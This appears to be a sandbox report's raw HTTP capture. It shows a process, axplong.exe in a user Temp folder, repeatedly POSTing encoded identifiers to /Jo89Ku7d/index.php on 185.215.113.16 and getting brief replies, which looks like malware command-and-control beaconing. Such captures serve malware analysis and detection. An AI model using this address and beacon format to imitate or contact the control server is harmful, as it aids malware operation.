                    Sep 27, 2024 05:53:03.599792957 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:03.607597113 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:03.964904070 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449738185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:04.090979099 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:04.826024055 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:04.827244043 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:05.084682941 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449739185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:05.202043056 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.449740185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:09.207912922 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:09.908310890 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.449741185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:10.028362036 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:10.818706036 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:10.819758892 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:11.041826963 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.449742185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:11.153100014 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:11.850214958 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:11.851105928 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:12.079926968 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.449743185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:12.240636110 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:12.988409996 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:12.993175030 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:13.231659889 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.449744185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:13.366993904 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:14.112597942 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:14.113521099 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:14.357228041 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.449745185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:14.466485023 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:15.188616037 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:15.205626011 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:15.433603048 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.449746185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:15.544646978 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:16.244219065 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:16.245404005 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:16.523679972 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.449747185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:16.637823105 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:17.395401955 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:17.396356106 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:17.631607056 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.449748185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:17.779239893 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:18.575508118 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:18.583463907 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:18.834453106 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.449749185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:18.959789038 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:19.705971003 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 05:53:19.706948042 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 05:53:19.941138983 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.449750185.215.113.16808136C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 05:53:20.059847116 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 05:53:20.844162941 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 03:53:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
